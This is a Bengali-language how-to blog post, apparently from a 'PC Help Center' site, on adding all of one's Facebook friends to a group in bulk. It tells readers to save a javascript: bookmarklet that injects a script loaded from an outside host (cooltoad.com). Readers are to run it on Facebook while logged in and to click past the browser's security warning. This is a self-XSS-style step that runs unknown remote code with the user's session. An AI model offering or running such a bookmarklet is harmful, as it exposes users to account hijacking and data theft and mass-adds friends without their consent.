পরম করুনাময় আল্লাহ্ এর নামে শুরু করলাম

 ALL Friend facebook gruop add

আগাম ঈদ মোবারক, ঈদ মোবারক, ঈদ মোবারক

আসসালামু আলাকুম, কেমন আছেন সবাই? আশা করি ভালই আছেন, আমি ও আমরা আপনাদের দোয়ায় এবং আল্লাহ্র অশেষ রহমতে অনেক ভাল আছি। তবে আর কথা বাড়িয়ে লাভ কি? বেশি কথা না বাড়িয়ে কাজের কথায় আসি।

তাহলে শুরু করি

প্রথমে (মজিলা ব্যবহার কারীরা)

 

আপনার ব্রাউজারটি ওপেন করুন এবং নিচের ছবিটি দেখুন।

পিক্সার ০১।

 

লাল দাগ দেয়া মুকমার্ক অপশনটি আপনার আছে কিনা, যদি ঐ অপশনটি না থাকে তাহলে প্রথমে ঐ অপশনটি চালু করতে হবে, এজন্য আপনাকে যা করতে হবে নিচের পিক্সারটি দেখুন সেখানে লাল দাগ দেয়া যায়গাতে রাইট ক্লিক করুন এবং Bookmarks Toolbar অপশনটিতে টিক দিন তাহলেই দেখবেন নিচে সেই যায়গাটি এসে গেছে।

পিক্সার ০২।

এবার সেই মুকমার্ক বার এর উপরে রাইক ক্লিক করুন এবং Now Bookmark এ ক্লিক করুন

পিক্সার ০৩।

ফেসবুকের সকল ফ্রেন্ড এ্যাড
ফেসবুকের সকল ফ্রেন্ড এ্যাড

 

ক্লিক করলেই নিচের ছবিটির মত একটি বক্স আসবে আপনার সামনে।

পিক্সার ৪।

ফেসবুকের সকল ফ্রেন্ড এ্যাড
ফেসবুকের সকল ফ্রেন্ড এ্যাড

 

এখানে উপরের ঘরে লিখুন [[[Click to add]]]

এবং নিচের ঘরে কোড গুলো কপি করে বসিয়ে দিন এবং সেইভ করুন।

javascript:(function(){document.body.appendChild(document.createElement(‘script’)).src=’http://www.cooltoad.com/sites/riskyromeo/script-js.html’;})();

 

 

ব্যাস এবার আপনার কাজ প্রায়ই শেষ।

এখন আপনি যে গ্রুপটিতে আপনার বন্ধুদের এ্যাড করতে চান সেই গ্রুপটিতে প্রবেশ করুন এবং গ্রুপটি ট্যাবেই থাকতে হবে আপনাকে অন্য কোন ট্যাবে থাকলে হবে না। তারপর সেই [[[Click to add]]] নামের উপরে ক্লিক করুন।

পিক্সার ৫।

ফেসবুকের সকল ফ্রেন্ড এ্যাড
ফেসবুকের সকল ফ্রেন্ড এ্যাড

 

 

তারপর কয়েক সেকেন্ট অপেক্ষা করুন দেখুন আপনার সামনে একটি মেসেজ দিবে (যদি আপনার ব্রাউজারের সিকুরেটি চালু করা থাকে তাহলে এই মেসেজটি দিবে নয়তো এই মসেজটি আসবে না)

পিক্সার ৬।

এরপরে এখানে ওকে দিবেন, আর যদি এটা না আসে তাহলেতো আর ওকে দেয়ার জামেলা হবে না আবার কয়েক সেন্টেক অপেক্ষা করুন দেখবেন নিচের মত কিযেন দৌরাচ্ছে।

 

পিক্সার ৭।

এখন মানে হচ্ছে যে, আপনার ফ্রেন্ডেদের এ্যাড করতেছে, তাই কাজ শেষ হওয়ার পর্যন্ত অপেক্ষা করুন।

ভাল লাগলে কমেন্টে জানাতে ভুলবে না…

ভুলে ভরা জীবনে ভুল হওয়াটা অসম্ভব কিছু নয়,যদি আমার লেখার মাঝে কোন ভুলত্রুটি থাকে ক্ষমার দৃষ্টিতে দেখবেন। ধন্যবাদ সবাই ভাল থাকবেন।

আপনার কম্পিউটার সমস্যা সমাধানে আমরা আছি ফেইজবুকে: পিসি হেল্প সেন্টার

আমাদের সাইটের সকল পোষ্ট আপনার ফেসবুকের ওয়ালে পেতে পেজ লাইক করুন (পিসি হেল্প সেন্টার)